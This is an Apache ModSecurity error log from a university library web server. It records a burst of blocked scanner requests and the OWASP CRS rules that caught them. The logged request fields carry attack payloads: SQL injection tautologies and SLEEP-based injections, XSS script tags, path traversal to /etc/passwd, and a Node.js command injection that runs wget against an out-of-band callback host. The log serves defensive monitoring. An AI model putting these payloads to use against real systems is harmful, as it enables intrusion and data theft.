[Tue Aug 29 11:43:40.397548 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAe399cAAAAA"]
[Tue Aug 29 11:43:40.480084 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) =  found within ARGS:q: 20) = 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v$instance)) from dual) is null  OR (1 1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO13fMCo-f0AAAdfta8AAAAG"]
[Tue Aug 29 11:43:42.507480 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAfBL04AAAAI"]
[Tue Aug 29 11:43:43.373738 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/file"] [unique_id "ZO13f8Co-f0AAARpg@cAAAAU"]
[Tue Aug 29 11:43:45.397401 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAeChfAAAAAw"]
[Tue Aug 29 11:43:47.408453 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAcsLMwAAAAE"]
[Tue Aug 29 11:43:48.348634 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAe8l4AAAAAF"]
[Tue Aug 29 11:43:48.431324 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAeChgAAAAAw"]
[Tue Aug 29 11:43:49.481143 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAcsLNkAAAAE"]
[Tue Aug 29 11:43:50.376973 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfh.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO13hsCo-f0AAAfBL2kAAAAI"]
[Tue Aug 29 11:43:50.441154 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:template_path: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/koha/svc/virtualshelves/search"] [unique_id "ZO13hsCo-f0AAAc4EswAAAAP"]
[Tue Aug 29 11:43:51.374655 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13h8Co-f0AAAe8l5EAAAAF"]
[Tue Aug 29 11:43:55.403730 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfWNzoAAAAL"]
[Tue Aug 29 11:43:55.692192 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAdxUasAAAAC"]
[Tue Aug 29 11:43:56.373245 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAARphBUAAAAU"]
[Tue Aug 29 11:43:57.368584 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAfFKBQAAAAR"]
[Tue Aug 29 11:43:58.367473 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAdOeXsAAAAS"]
[Tue Aug 29 11:43:59.367845 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAdOeX4AAAAS"]
[Tue Aug 29 11:44:03.520563 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAeX1LQAAAAK"]
[Tue Aug 29 11:44:03.723669 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAfSWZEAAAAB"]
[Tue Aug 29 11:44:07.412585 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../config.text"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/download.do"] [unique_id "ZO13l8Co-f0AAAdb7yEAAAAb"]
[Tue Aug 29 11:44:08.388316 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:defaultlanguage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:defaultlanguage: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/pages/setup.php"] [unique_id "ZO13mMCo-f0AAAfSWZoAAAAB"]
[Tue Aug 29 11:44:08.471563 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13mMCo-f0AAAdftegAAAAG"]
[Tue Aug 29 11:44:10.539766 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22>< found within ARGS:email: test@gmail.com'\\x5c\\x22><svg/onload=alert(/xss/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/email/unsubscribed"] [unique_id "ZO13msCo-f0AAAcvBrAAAAAJ"]
[Tue Aug 29 11:44:13.381034 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAfiYlkAAAAg"]
[Tue Aug 29 11:44:14.451384 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAc4Ew0AAAAP"]
[Tue Aug 29 11:44:16.469405 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26go4mdx87xd4qto.oast.site found within TX:1: cjmnbitjmimt14dgn26go4mdx87xd4qto.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAc4ExIAAAAP"]
[Tue Aug 29 11:44:18.409638 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13osCo-f0AAAfiYmUAAAAg"]
[Tue Aug 29 11:44:20.397718 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gb7963j3cjfirs.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAfGacAAAAAT"]
[Tue Aug 29 11:44:23.491416 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAARphDMAAAAU"]
[Tue Aug 29 11:44:26.399880 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAdOebYAAAAS"]
